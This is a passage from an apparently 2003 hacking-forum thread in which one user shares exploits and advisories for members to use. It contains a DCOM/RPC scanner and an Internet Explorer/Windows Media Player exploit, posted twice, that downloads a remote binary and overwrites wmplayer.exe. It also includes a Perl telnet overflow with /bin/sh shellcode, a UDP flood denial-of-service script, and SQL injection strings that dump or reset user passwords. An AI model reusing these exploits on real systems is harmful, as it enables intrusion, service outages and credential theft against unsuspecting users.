bindstr = "05000b03100000004800000001000000d016d0160000000001 00000000000100a001000000000000c0000000000000460000 0000045d888aeb1cc9119fe808002b10486002000000";
send(socket:soc, data:hex2raw(s:bindstr));
r = dcom_recv(socket:soc);
if(!r)exit(0);

send(socket:soc, data:req);
r = dcom_recv(socket:soc);
if(!r)return NULL;

error_code = substr(r, strlen� - 24, strlen� - 20);
return error_code;
}
#---------------------------------------------------------------#

# Determine if we the remote host is running Win955/98/ME
bindwinme = "05000b03100000004800000053535641d016d0160000000001 00000000000100e6730ce6f988cf119af10020af6e72f40200 0000045d888aeb1cc9119fe808002b10486002000000";
soc = open_sock_tcp(port);
if(!soc)exit(0);
send(socket:soc, data:hex2raw(s:bindwinme));
rwinme = dcom_recv(socket:soc);
close(soc);
lenwinme = strlen(rwinme);
stubwinme = substr(rwinme, lenwinme-24, lenwinme-21);

# This is Windows 95/98/ME which is not vulnerable
if("02000100" >< hexstr(stubwinme))exit(0);

#----------------------------------------------------------------#

REGDB_CLASS_NOTREG = "5401048000";
CO_E_BADPATH = "0400088000";
NT_QUOTE_ERROR_CODE_EQUOTE = "00000000";

#
req1 = "0500000310000000b003000001000000980300000000040005 00020000000000000000000000000000000000000000000000 000000000000000000009005140068030000680300004d454f 5704000000a201000000000000c00000000000004638030000 00000000c00000000000004600000000380300003003000000 00000001100800ccccccccc80000000000000030030000d800 00000000000002000000070000000000000000000000000000 000000000018018d00b8018d000000000007000000b9010000 00000000c000000000000046ab01000000000000c000000000 000046a501000000000000c000000000000046a60100000000 0000c000000000000046a401000000000000c0000000000000 46ad01000000000000c000000000000046aa01000000000000 c0000000000000460700000060000000580000009000000058 000000200000006800000030000000c000000001100800cccc cccc5000000000000000ffffffff0000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000001100800cccccccc4800 000000000000005d889aeb1cc9119fe808002b104860100000 0000000000000000000100000000000000b8470a005800 000005000600010000000000000000000000c0000000000000 46cccccccc01100800cccccccc800000000000000000000000 00000000000000000000000020ba0900000000006000000060 0000004d454f5704000000c001000000000000c00000000000 00463b03000000000000c00000000000004600000000300000 0001000100673c70941333fd4687244d093988939d02000000 00000000000000000000000000000000000000000100000001 100800cccccccc480000000000000000000000b07e09000000 000000000000f0890a0000000000000000000d000000000000 000d000000730061006a00690061006400650076005f007800 3800360000000800cccccccc01100800cccccccc1000000000 0000000000000000000000000000000000000001100800cccc cccc5800000000000000c05e0a000000000000000000000000 001b000000000000001b0000005c005c0000005c006a006900 61006400650076005f007800000036005c007000750062006c 00690063005c00410041004100410000000000010015000110 0800cccccccc200000000000000000000000905b0900020000 0001006c00c0df0800010000000700550000000000";

req2 = "0500000310000000b003000002000000980300000000040005 00020000000000000000000000000000000000000000000000 000000000000000000009005140068030000680300004d454f 5704000000a201000000000000c00000000000004638030000 00000000c00000000000004600000000380300003003000000 00000001100800ccccccccc80000000000000030030000d800 00000000000002000000070000000000000000000000000000 000000000018018d00b8018d000000000007000000b9010000 00000000c000000000000046ab01000000000000c000000000 000046a501000000000000c000000000000046f60100000000 0000c000000000000046ff01000000000000c0000000000000 46ad01000000000000c000000000000046aa01000000000000 c0000000000000460700000060000000580000009000000058 000000200000006800000030000000c000000001100800cccc cccc5000000000000000ffffffff0000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000001100800cccccccc4800 000000000000005d889aeb1cc9119fe808002b104860100000 0000000000000000000100000000000000b8470a005800 000005000600010000000000000000000000c0000000000000 46cccccccc01100800cccccccc800000000000000000000000 00000000000000000000000020ba0900000000006000000060 0000004d454f5704000000c001000000000000c00000000000 00463b03000000000000c00000000000004600000000300000 0001000100673c70941333fd4687244d093988939d02000000 00000000000000000000000000000000000000000100000001 100800cccccccc480000000000000000000000b07e09000000 000000000000f0890a0000000000000000000d000000000000 000d000000730061006a00690061006400650076005f007800 3800360000000800cccccccc01100800cccccccc1000000000 0000000000000000000000000000000000000001100800cccc cccc5800000000000000c05e0a000000000000000000000000 001b000000000000001b0000005c005c0000005c006a006900 61006400650076005f007800000036005c007000750062006c 00690063005c00410041004100410000000000010015000110 0800cccccccc200000000000000000000000905b0900020000 0001006c00c0df0800010000000700550000000000";

req3 = "05000e03100000004800000003000000d016d01605af000001 00000001000100b84a9f4d1c7dcf11861e0020af6e7c570000 0000045d888aeb1cc9119fe808002b10486002000000";

req4 = "05000003100000009a00000003000000820000000100000005 00020000000000000000000000000000000000000000000000 0000000000009596952a8cda6d4ab23619bcaf2c2dea34eb8f 000700000000000000070000005c005c004d0045004f005700 00000000000000005c0048005c0048000100000058e98f0001 0000009596952a8cda6d4ab23619bcaf2c2dea010000000100 00005c00";

#display(hex2raw(s:req));
#exit(0);

error1 = check(req:hex2raw(s:req1));
error2 = check(req:hex2raw(s:req2));

#error3 = check(req:hex2raw(s:req3));
#error4 = check2(req:hex2raw(s:req4));

#display("error1=", hexstr(error1), "\n");
#display("error2=", hexstr(error2), "\n");
#display("error3=", hexstr(error3), "\n");
#display("error4=", hexstr(error4), "\n");

if(hexstr(error2) == hexstr(error1))
{
if(hexstr(error1) == "0500078000")exit(0); # DCOM disabled
security_hole(port);
}
else {
set_kb_item(name:"SMB/KB824146", value:TRUE);
}

NI3

09-11-2003, 12:58 PM

salam ino man be onvane dcom new scaner gereftam.rasti kasi dcome ro porte 1025 ro peyda nakarde /
enshalah dcome jadid ham midim be site :d
babye

NI3

09-11-2003, 01:02 PM

hi in linke exploit
[Only registered and activated users can see links]
compilesham gozashtam
man to site ino nadidam ageh bod sharmande

NI3

09-11-2003, 01:29 PM

bache ha emrooz che khabaryi hast :Buffer Overflow in UDP broadcasts for Microsoft SQL Server client utilities
Date: 2003-09-10

Author : Aaron C. Newman (Application Security, Inc.) <[Only registered and activated users can see links]>

Risk level: High

[Only registered and activated users can see links]

Summary:
A Unicode buffer overflow exists in MDAC which is used by the SQL Server SQL-DMO library that could allow a remote user to execute malicious code on the target computer. The vulnerability does not occur when accepting incoming connections, but rather in the response to broadcast queries.

Details:
One of the features of the SQL Server network libraries is the ability to query a list of SQL Servers on the local network. This is accomplished by sending a UDP broadcast on port 1434 which will reach all applications on the local subnet. This function is a component of SQL-DMO which is used by the SQL Server Service Manager (whenever it is started), Enterprise Manager (when registering a server), Query Analyzer and SQL Profiler (when clicking "..." button), DTS (when selecting a SQL Server), etc...

All SQL Servers receiving the broadcast request respond with a standard UDP packet. If a malicious machine responds to this broadcast with an overlong packet a stack buffer overflow occur. The overflow occurs in a UNICODE string, so the Venetian method of performing a buffer overflow would need to be used to exploit this vulnerability. There is a white paper from Chris Ansley on how this is done, as well as a presentation from Dave Aitel.

Any SQL Server utilities that use the SQL-DMO function to retrieve a list of SQL Servers will be vulnerable to this attack. An attack is not mounted directly against the target. Instead an attacker could attempt several methods of exploiting the vulnerability:

1) Setup a service listening for data on UDP port 1434 and responding with the attack payload whenever data is received. This network would require being on the same subnet.

2) Bombarding a remote subnet with UDP attack packets waiting for someone to query the network. For example, send the attack packet every 2 seconds to 192.168.3.255 will reach all machines on the 192.168.3.x subnet. When someone finally does send a UDP broadcast, they will accept this packet and be exploited. This method would take a bit of luck, persistence, or some social engineering.

3) It may also be possible for a non-privileged login in MS SQL to cause the SQL Server to send out a query request directly to an IP Address on the network. The following SQL statement causes the SQL Server to query a host named SERVER with a UDP packet:

SELECT * FROM openrowset( 'SQLOLEDB', 'server=SERVER\instance name;uid=sa;pwd=', '')

However, on our systems, we were unable to trigger the overflow from the response. There may be other methods to cause the SQL Server to send the UDP query and trigger the overflow.

One of the features of SQL Server which makes this vulnerability simpler to exploit is that the SQL Server Service Manager queries the network using SQL-DMO every time it starts which happens when a user with the SQL Server client utilities logs into Windows. This would occur anytime someone logged into the Windows server on which SQL Server is installed, or anytime a database administrator logs into his or her machine.

Links:
[Only registered and activated users can see links]
[Only registered and activated users can see links] technet/security/bulletin/MS03-033.asp

Fix:
This vulnerability affects the following packages:
Microsoft Data Access Components 2.7 SP1
Microsoft Data Access Components 2.7
Microsoft Data Access Components 2.6 SP2
Microsoft Data Access Components 2.5 SP3
Microsoft Data Access Components 2.5 SP2

If you have one of these packages installed, apply the hot fix from
[Only registered and activated users can see links]

NI3

09-11-2003, 01:43 PM

NI3

09-13-2003, 01:26 PM

hi
dcom2 scaner
a file for a code and a compile on and another link babye :

[Only registered and activated users can see links]

NI3

09-15-2003, 10:29 AM

hi omidvaram ke jadid bashe va halesho bebarin :d

------------------
<textarea id="code" style="display:none;">

var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "[Only registered and activated users can see links]",0);
x.Send();

var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);

s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
location.href = "mms://";

</textarea>
Wait a couple of seconds..

<script language="javascript">

function preparecode(code) {
result = '';
lines = code.split(/\r\n/);
for (i=0;i<lines.length;i++) {

line = lines[i];
line = line.replace(/^\s+/,"");
line = line.replace(/\s+$/,"");
line = line.replace(/'/g,"\\'");
line = line.replace(/[\\]/g,"\\\\");
line = line.replace(/[/]/g,"%2f");

if (line != '') {
result += line +'\\r\\n';
}
}
return result;
}

function doit() {
mycode = preparecode(document.all.code.value);
myURL = "file:javascript:eval('" + mycode + "')";
window.open(myURL,"_media")
}

window.open("error.jsp","_media");

setTimeout("doit()", 5000);

</script>

NI3

09-15-2003, 05:27 PM

hi exploite RealOne Player 9

NI3

09-15-2003, 05:29 PM

salam ageh tekrari hast bebakhshid vali fek nakonam bashe

NI3

09-15-2003, 07:37 PM

here is the latest news .....

NI3

09-21-2003, 11:14 AM

hi barbach
in code rpc2 yeki compilesh kone in motmaene digeh :d
[Only registered and activated users can see links]

inam ye rpc2 bara noskhaye chini ageh dorost gofte basham
ageh tonestid target besh ezafe kondi
babye

NI3

09-21-2003, 11:20 AM

dar rabete ba on dcom2 ke comiplesho dadam inam bayad begam :
0--------------------------0
it`s only for cn win2k sp3/sp4+ms-03-026(patched)
add user SST of administrators pass:557
-----
thx
bye'

NI3

09-21-2003, 04:25 PM

bache ha man ino didam shayad bedardeton bekhore

----

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <errno.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/wait.h>

#undef False
#define False 0
#undef True
#define True 1

#define DEFAULT_REMOTE_PORT 23

/*
* Define this if <unistd.h> doesn't declare getopt() and friends.
*/
#define BOGUS_UNISTD

static void perror_exit(const char *msg)
{
perror(msg);
_exit(1);
}

static void* xrealloc(void *ptr, size_t size)
{
if (!ptr)
ptr = malloc(size); /* Hack for broken C libraries */
else
ptr = realloc(ptr, size);

if (!ptr)
perror_exit("malloc");

return ptr;
}

static struct in_addr *allowed_hosts = NULL;
static long n_hosts = 0;
static long n_alloced = 0;

static void allow_host(char *host)
{
struct hostent *hent;

hent = gethostbyname(host);
if (!hent) {
fprintf(stderr, "No such host: %s\n", host);
return;
}

if (n_hosts >= n_alloced)
allowed_hosts = xrealloc(allowed_hosts,
(n_alloced = 2 * (n_alloced + 1)) *
sizeof allowed_hosts[0]);

memcpy(&allowed_hosts[n_hosts++], hent->h_addr, hent->h_length);
}

static int is_allowed(struct sockaddr_in *addr)
{
long i;

for (i = 0 ; i < n_hosts ; i++)
if (memcmp(&addr->sin_addr, &allowed_hosts[i],
sizeof addr->sin_addr) == 0)
return True;

return False;
}

static struct sockaddr_in get_remote_host(char *host)
{
struct sockaddr_in addr;
struct hostent *hent;
char *c;

memset(&addr, 0, sizeof addr);
addr.sin_family = PF_INET;
addr.sin_port = htons(DEFAULT_REMOTE_PORT);
c = strchr(host, ':');
if (c) {
*c++ = '\0';
/* FIXME: error check? */
addr.sin_port = htons(atoi(c));
}

hent = gethostbyname(host);
if (!hent) {
fprintf(stderr, "No such host: %s\n", host);
_exit(1);
}

memcpy(&addr.sin_addr, hent->h_addr, hent->h_length);

return addr;
}

static int do_rw(int from, int to)
{
static char buffer[16384];
char *c;
long i, j, n;

do {
n = read(from, buffer, sizeof buffer);
} while (n < 0 && errno == EINTR);

c = buffer;
i = n;
while (i > 0) {
j = write(to, c, i);
if (j < 0)
if (errno == EINTR)
continue;
else
return -1;
if (j == 0)
return 0;
c += j;
i -= j;
}

return n;
}

static int open_serv_socket(struct sockaddr_in *serv_addr)
{
int ss, tmp;

ss = socket(PF_INET, SOCK_STREAM, 0);
if (ss < 0)
return -1;

do {
tmp = connect(ss, (struct sockaddr *)serv_addr, sizeof *serv_addr);
} while (tmp < 0 && errno == EINTR);

if (tmp < 0) {
perror("connect");
close(ss);
return -1;
}

return ss;
}

static int child(struct sockaddr_in *serv_addr, int cs)
{
fd_set fds;
int max, ss, tmp = 0;

ss = open_serv_socket(serv_addr);
if (ss < 0)
return -1;

FD_ZERO(&fds);
FD_SET(cs, &fds);
FD_SET(ss, &fds);
max = (cs > ss ? cs : ss) + 1;

for (;;) {
fd_set rd_fds = fds;

tmp = select(max, &rd_fds, NULL, NULL, NULL);
if (tmp < 0)
if (errno == EINTR)
continue;
else
break;

if (FD_ISSET(cs, &rd_fds)) {
tmp = do_rw(cs, ss);
if (tmp <= 0)
break;
}

if (FD_ISSET(ss, &rd_fds)) {
tmp = do_rw(ss, cs);
if (tmp <= 0)
break;
}
}

if (tmp < 0)
perror("read/write");

close(ss);

return tmp;
}

static void doit(struct sockaddr_in *serv_addr, int port, int single)
{
struct sockaddr_in local_addr, cli_addr;
int as;
int yes = 1;

memset(&local_addr, 0, sizeof local_addr);
local_addr.sin_family = PF_INET;
local_addr.sin_port = port;

as = socket(PF_INET, SOCK_STREAM, 0);
if (as < 0)
perror_exit("socket");
if (setsockopt(as, SOL_SOCKET, SO_REUSEADDR, (char *)&yes, sizeof yes) < 0)
perror_exit("setsockopt(SO_REUSEADDR)");
if (bind(as, (struct sockaddr *)&local_addr, sizeof local_addr) < 0)
perror_exit("bind");
if (listen(as, 5) < 0)
perror_exit("listen");

for (;;) {
int cs, len;

do {
len = sizeof cli_addr;
cs = accept(as, (struct sockaddr *)&cli_addr, &len);
} while (cs < 0 && errno == EINTR);

if (cs < 0)
perror_exit("accept");

if (!is_allowed(&cli_addr)) {
static char deny[] = "502 You have no permission to talk!\r\n";

if (serv_addr->sin_port == htons(119))
write(cs, deny, sizeof deny - 1);
shutdown(cs, 2);
close(cs);
continue;
}

if (single)
child(serv_addr, cs);
else
switch (fork()) {
case -1:
perror_exit("fork");
break;
case 0:
if (child(serv_addr, cs) < 0)
_exit(1);
_exit(0);
default:
break;
}

close(cs);
}
}

/************************************************** **********************/

static void sig_chld(int no)
{
while (waitpid(-1, NULL, WNOHANG) > 0);
}

static void install_sig_handlers(void)
{
struct sigaction sig_act;

sig_act.sa_handler = sig_chld;
sig_act.sa_flags = 0;
sigfillset(&sig_act.sa_mask);
if (sigaction(SIGCHLD, &sig_act, NULL) < 0)
perror_exit("sigaction(SIGCHLD)");

sig_act.sa_handler = SIG_IGN;
sig_act.sa_flags = 0;
sigemptyset(&sig_act.sa_mask);
if (sigaction(SIGPIPE, &sig_act, NULL) < 0)
perror_exit("sigaction(SIGPIPE)");
}

static void usage(char *name)
{
fprintf(stderr, "Usage: %s -p port [-s] -h host [...] remotehost:port\n",
name);
_exit(1);
}

int main(int argc, char *argv[])
{
struct sockaddr_in serv_addr;
int single = False;
int port = 0;
int c;
#ifdef BOGUS_UNISTD
extern int getopt(int, char *const[], const char*);
extern char *optarg;
extern int optind, opterr;
#endif

freopen("/dev/null", "r", stdin);
freopen("/dev/null", "w", stdout);

install_sig_handlers();

opterr = 0;
while ((c = getopt(argc, argv, "p:h:s")) != -1)
switch (c) {
case 'p': /* port to listen on */
if (sscanf(optarg, "%d", &port) != 1 || port < 0)
usage(argv[0]);
port = htons(port);
break;
case 's':
single = True;
break;
case 'h':
allow_host(optarg);
break;
default:
usage(argv[0]);
break;
}

if (optind != argc - 1 || port == 0)
usage(argv[0]);

if (n_hosts <= 0) {
fprintf(stderr, "No allowed hosts!\n");
_exit(1);
}

serv_addr = get_remote_host(argv[optind]);
doit(&serv_addr, port, single);

return 0;
}

// EOF

NI3

09-21-2003, 04:31 PM

read this :!!
------
AFFECTED :LINUX-:Debian-Redhat-Mandrake-Slackware-possibly others
BSD:free bsd -possibly others
Bug: there is a bug the telnet client that causes a stack
overflow by filling the DISPLAY environment variable with approx 1000-3000
bytes, allowing possible code execution to take place.-
---

Example:

[ dethy@syn ] $ export DISPLAY=`perl -e 'print "A"x1000'`
[ dethy@syn ] $ telnet localhost

Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Segmentation fault (core dumped)

Now loading up gdb, we see the following:
#0 0x41414141 in ?? ()
(gdb) info all-registers
eax 0xbfbfd672 -1077946766
ecx 0x3e 62
edx 0x80574d0 134575312
ebx 0xf0 240
esp 0xbfbfd6e8 0xbfbfd6e8
ebp 0x41414141 0x41414141
esi 0xc 12
edi 0xf 15
eip 0x41414141 0x41414141
eflags 0x10246 66118

..a successful hit! EIP and EBP were overwritten, thus arbitary code could
be spawned, but a shell is good enough for us. :)

Below is a proof of concept exploit that demonstrates the overflow by spawning
a shell through telnet, once the environment variable has been set.

#!/usr/bin/perl
# Generic exploit program in perl, which clears the environment to take
# away the need for offset guessing.
# Dvorak (@synnergy.net // @hit2000.org) 1999.

$egg = "\x90" x 1500;
$egg .= "\xeb\x37\x5e\x31\xc0\x88\x46\xfa\x89\x46\xf5\x89\x 36\x89\x76";
$egg .= "\x04\x89\x76\x08\x83\x06\x10\x83\x46\x04\x18\x83\x 46\x08\x1b";
$egg .= "\x89\x46\x0c\x88\x46\x17\x88\x46\x1a\x88\x46\x1d\x 50\x56\xff";
$egg .= "\x36\xb0\x3b\x50\x90\x9a\x01\x01\x01\x01\x07\x07\x e8\xc4\xff";
$egg .= "\xff\xff\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x 02\x02\x02";
$egg .= "\x02\x02\x02/bin/sh.-c.sh";

foreach $key (keys %ENV) {
delete $ENV{$key};
}

# change the size of $buf if you need to.

$buf="";
for ($i = 0; $i < 256; $i++) {
$buf .= "\x01\xda\xbf\xbf";
}

# Put here your use for $buf, the string to exploit the vulnerable program with

$ENV{"DISPLAY"} = $buf;
$ENV{"egg"} = $egg;
system("/usr/bin/telnet localhost");

printf("Exploit done\n");

--babye

NI3

10-01-2003, 04:07 PM

hi bache ha khobid
man chan rooz nabodam sorry
vali ino begirid
:d
bye

NI3

10-02-2003, 06:51 PM

chan ta code jadid:
--
Posted on 29 September 2003

From: <res076cf(at)alltel.net>

Howdy,

Tested on an SMC2404WBR - BarricadeT Turbo 11/22 Mbps Wireless Cable/DSL Broadband Router.

Sending a stream of UDP random packets to multiple ports 0-65000 on the router will cause the router to freeze until a soft reset is performed on it. In one case, the router did survive but did not come back "alive" for around 15 minutes. All other tries (2 others) the router had to be reset. This attack was performed using the Zonealarm+Windows 98 DoS code written by _6mO_HaCk.

The code follows:
-----------------snip---------------------

#!/usr/bin/perl
use Socket;

system(clear);
print "\n";
print "--- ZoneAlarm Remote DoS Xploit\n";
print "---\n";
print "--- Discovered & Coded By _6mO_HaCk\n";
print "\n";
if(!defined($ARGV[0]))
{
&usage
}

my ($target);
$target=$ARGV[0];

my $ia = inet_aton($target) || die ("[-] Unable to resolve
$target");

socket(DoS, PF_INET, SOCK_DGRAM, 17);
$iaddr = inet_aton("$target");

print " DoSing $target ... wait 1 minute and then CTRL+C to stop\n";

for (;;) {
$size=$rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x
$rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x
$rand x $rand;
$port=int(rand 65000) +1;
send(DoS, 0, $size, sockaddr_in($port, $iaddr));
}
sub usage {die("\n\n Usage : perl $0 <Target>\n\n");}
-----------------------snip--------------------------------------

NI3

10-02-2003, 06:54 PM

hi
new codes are comin :d
------------
Posted on 29 September 2003

From: <res076cf(at)alltel.net>

Howdy,

Tested on an SMC2404WBR - BarricadeT Turbo 11/22 Mbps Wireless Cable/DSL Broadband Router.

Sending a stream of UDP random packets to multiple ports 0-65000 on the router will cause the router to freeze until a soft reset is performed on it. In one case, the router did survive but did not come back "alive" for around 15 minutes. All other tries (2 others) the router had to be reset. This attack was performed using the Zonealarm+Windows 98 DoS code written by _6mO_HaCk.

The code follows:
-----------------snip---------------------

#!/usr/bin/perl
use Socket;

system(clear);
print "\n";
print "--- ZoneAlarm Remote DoS Xploit\n";
print "---\n";
print "--- Discovered & Coded By _6mO_HaCk\n";
print "\n";
if(!defined($ARGV[0]))
{
&usage
}

my ($target);
$target=$ARGV[0];

my $ia = inet_aton($target) || die ("[-] Unable to resolve
$target");

socket(DoS, PF_INET, SOCK_DGRAM, 17);
$iaddr = inet_aton("$target");

print " DoSing $target ... wait 1 minute and then CTRL+C to stop\n";

for (;;) {
$size=$rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x
$rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x
$rand x $rand;
$port=int(rand 65000) +1;
send(DoS, 0, $size, sockaddr_in($port, $iaddr));
}
sub usage {die("\n\n Usage : perl $0 <Target>\n\n");}
-----------------------snip--------------------------------------

Dave, put down the Windows disk Dave. Dave? DAVE?!!? - Hal9000

NI3

10-02-2003, 07:03 PM

another css:
version: 2.0 (and possibly earlier versions)
Vendor: OmniCom Technologies
- [Only registered and activated users can see links] Issue: 1. Buffer overflow in client handling hostnames in host files
2. DoS against server

Released: 27 September 2003

Introduction:
=============
"winshdow: Create a secure remote control session on the Internet or private WAN/LAN network allowing easy access to remote files and applications. Increase productivity by allowing secure remote access for mobile users and system administrators."

- Vendors Description
[ [Only registered and activated users can see links] ]

Details:
========
Multiple vulnerabilities has been identified in winShadow version 2.0, which allows malicious users to execute arbitrary code on the master client and remotely crash the server.

Buffer Overflow:
----------------
winShadow saves hostnames in host files (*.osh), the process handing the hostname parameter read from the file will cause a buffer overflow if approximately 250 bytes are passed after this parameter.

Denial of Service:
------------------
By connecting to the server and issuing a long username or password, the server will crash, refusing any further connections until the server is closed by logging off or rebooting the system, this may be because it a service that runs with system privileges.

Vendor status:
==============
The vendor has been informed.

Exploit:
========
Can be downloaded from [Only registered and activated users can see links]
The exploit was written by Peter Winter-Smith.

Discovered by/Credit:
=====================
Bahaa Naamneh
[Only registered and activated users can see links]
[Only registered and activated users can see links]

NI3

10-02-2003, 07:48 PM

the newst :
---
Posted on 02 October 2003

From: Bahaa Naamneh <[Only registered and activated users can see links]>

------------------------------------- Affected Systems: OmniCom WinShadow
version: 2.0 (and possibly earlier versions)
Vendor: OmniCom Technologies
- [Only registered and activated users can see links] Issue: 1. Buffer overflow in client handling hostnames in host files
2. DoS against server

Released: 27 September 2003

Introduction:
=============
"winshdow: Create a secure remote control session on the Internet or private WAN/LAN network allowing easy access to remote files and applications. Increase productivity by allowing secure remote access for mobile users and system administrators."

- Vendors Description
[ [Only registered and activated users can see links] ]

Details:
========
Multiple vulnerabilities has been identified in winShadow version 2.0, which allows malicious users to execute arbitrary code on the master client and remotely crash the server.

Buffer Overflow:
----------------
winShadow saves hostnames in host files (*.osh), the process handing the hostname parameter read from the file will cause a buffer overflow if approximately 250 bytes are passed after this parameter.

Denial of Service:
------------------
By connecting to the server and issuing a long username or password, the server will crash, refusing any further connections until the server is closed by logging off or rebooting the system, this may be because it a service that runs with system privileges.

Vendor status:
==============
The vendor has been informed.

Exploit:
========
Can be downloaded from [Only registered and activated users can see links]
The exploit was written by Peter Winter-Smith.

Discovered by/Credit:
=====================
Bahaa Naamneh
[Only registered and activated users can see links]
[Only registered and activated users can see links]

NI3

10-02-2003, 07:52 PM

the last for today
-----
Posted on 02 October 2003

From: Lifo Fifo <[Only registered and activated users can see links]>

Never use this product if you have turned off magic_quotes_gpc. And this product won't work anyway if you have turned off register_globals.
All the files in the product, dont check for integrity of variables. You can easily exploit this using some SQL Injection techniques. For example, if you want to get username/password of all the users, you can exploit advertiser.php.

Open it like,

[Only registered and activated users can see links]' or 1=1 UNION select uid,name,password,surname,job,email from dcp5_members into outfile 'c:/apache2/htdocs/dcpad.txt

This is for windows, if web-server is running on *nix, then you could enter something like,

[Only registered and activated users can see links]' or 1=1 UNION select uid,name,password,surname,job,email from dcp5_members into outfile '/var/[Only registered and activated users can see links]

In this cases, you will need to enter the absolute path. For that, run the follwing

[Only registered and activated users can see links]' and that will show the path to the sever if they have turned on display_errors in php.ini.

That's all ! Notice that here we are using UNION function in query. For that, the host should be running version MySQL 4.x. Well, if it's not running 4.x, No problem, we have another file !

This time it's lostpassword.php.

Open it like,

[Only registered and activated users can see links]' or 1=1--'

This will really cause some damage. It will reset password of everyone. Everyone will get as many mails as the number of users. And evryone's password will be the one provided in the last email.

I didn't have time to check if there was injection possible with some numeric field. If it's there, one can launch select-fish attacks, which would work even in case of magic_quotes_gpc is on.

Fix : Insteading of fixing it, simply turn on magic_quotes_gpc. Otherwise it will take you as much time as they took in making DCP Portal.

-lifofifo
[Only registered and activated users can see links]

NI3

10-05-2003, 04:57 PM

shayad be dardetoon bekhore

NI3

10-05-2003, 05:05 PM

hi folks :
here is the link :d : [Only registered and activated users can see links]

NI3

10-05-2003, 05:07 PM

In order for the recent IE exploits that have been posted here to actually work, you MUST do a couple of things. . .

First, visit :[Only registered and activated users can see links] Fdienste%2Fbrowsercheck%2Fdemos%2Fie%2Fe5_15.shtml&langpair=de%7Cen&hl=de&ie=UTF8&oe=UTF8

After reading this, you should realize that you cannot use this exploit unless you have your own server setup on your computer. I recommend you go and download apache a see how it works. Then get used to configuration. . . .

When you do that, it should be clear to you from the link above what you must do. Try searching google on the topic of configuration of content-type: application/hta on apache. It's not that difficult, and I'm not going to spoon feed it to you any more than I already have, which is probably too much. I'm hoping that people only use this for "educational" purposes, which is what it will be for if you set up the server on your own computer and don't register it with DNS.

I also think that we owe illwill more than most people think because, if it were not for him, we would not have even been exposed to this exploit for research and discussion; and only research and discussion. He has posted before that his exploits are not for the general masses to use, and therefore we should respect him and not use this in the wild

NI3

10-05-2003, 05:13 PM

here is the code :
--
/************************************************** **********************
* Appshutdown.c
*
* Demonstrates the use of PostThreadMessage to;
* - shutdown any application with a message handler
*
* The window title can be specified in code or on the command line
*
* Works against any application/service process that
* has implemented a message handler
*
************************************************** ***********************/
#include <windows.h>
#include <commctrl.h>
#include <stdio.h>
char tWindow[]="Windows Task Manager";// The name of the main window
char* pWindow;
int main(int argc, char *argv[])
{
long hWnd;
unsigned long proc;
HWND myhwnd;
DWORD hThread;
printf("%% AppShutdown - Playing with PostThreadMessage\n");
printf("%% [Only registered and activated users can see links]\n\n");
// Specify Window Title On Command Line
if (argc ==2)
pWindow = argv[1];
else
pWindow = tWindow;

printf("+ Finding %s Window...\n",pWindow);
hWnd = (long)FindWindow(NULL,pWindow);
myhwnd = FindWindow(NULL,pWindow);
if(hWnd == NULL)
{
printf("+ Couldn't Find %s Window\n",pWindow);
return 0;
}
printf("+ Found Main Window At...0x%xh\n",hWnd);
printf("+ Finding Window Thread..");
hThread = GetWindowThreadProcessId(myhwnd,
&proc);
if(hThread == NULL)
{
printf("Failed\n");
return 0;
}
printf("0x%xh Process 0x%xh\n",hThread,proc);
printf("+ Send Quit Message\n");
PostThreadMessage((DWORD) hThread,(UINT) WM_QUIT,0,0);
printf("+ Done...\n");
return 0;
}
---

NI3

10-08-2003, 03:10 PM

hi all
---
Windows Media Player+IE6 XML bypass flaw exploit?@

<textarea id="code" style="display:none;">

var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", " [Only registered and activated users can see links]";,0);
x.Send();

var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);

s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
location.href = "mms://";

</textarea>
Please wait a few seconds...<br>
Microsoft has released a new patch which they say fixes this vulnerability.
I have checked with 6 people who have downloaded the patch, including myself,
and whenever I try wmp.htm, the vb app runs.
<br>
If it doesn't work the first time, press refresh (It's IE, sometimes it works
and sometimes it decides not to)
<p>
As a solution you should click Tools-Internet Options and then press the Advanced
Tab. Now scroll down to Multimedia and check the box (usually the first one) that
says "Don't display online content media in the media bar".
<p>
- Mindwarper
<script language="javascript">

function preparecode(code) {
result = '';
lines = code.split(/\r\n/);
for (i=0;i<lines.length;i++) {

line = lines[i];
line = line.replace(/^\s+/,"");
line = line.replace(/\s+$/,"");
line = line.replace(/'/g,"\\'");
line = line.replace(/[\\]/g,"\\\\");
line = line.replace(/[/]/g,"%2f");

if (line != '') {
result += line +'\\r\\n';
}
}
return result;
}

function doit() {
mycode = preparecode(document.all.code.value);
myURL = "file:javascript:eval('" + mycode + "')";
window.open(myURL,"_media");
}

window.open("ieerror.php","_media");

setTimeout("doit()", 5000);

</script>

NI3

10-08-2003, 03:25 PM

myPHPNuke is a content management system written in PHP. An SQL Injection vulnerability in the product allows remote attackers to insert malicious arbitrary SQL statements into those used by the product allowing compromise of the server and database.

Details
Vulnerable systems:
* myPHPnuke version 1.8.8

Vulnerable code:
In the auth.inc.php file:
if ((isset($aid)) && (isset($pwd)) && ($op == "login")) {
if($aid!="" AND $pwd!="") {
$q="select pwd from ".$mpnTables['authors']." where aid='$aid'";
$result=mysql_query("select pwd from ".$mpnTables['authors']." where aid='$aid'");
list($pass)=mysql_fetch_row($result);
if ($pass == $pwd) {
$pwd1 = md5($pwd);
mysql_query("update ".$mpnTables['authors']." set pwd = '$pwd1' where aid='$aid'");
$pass = $pwd1;
} else {
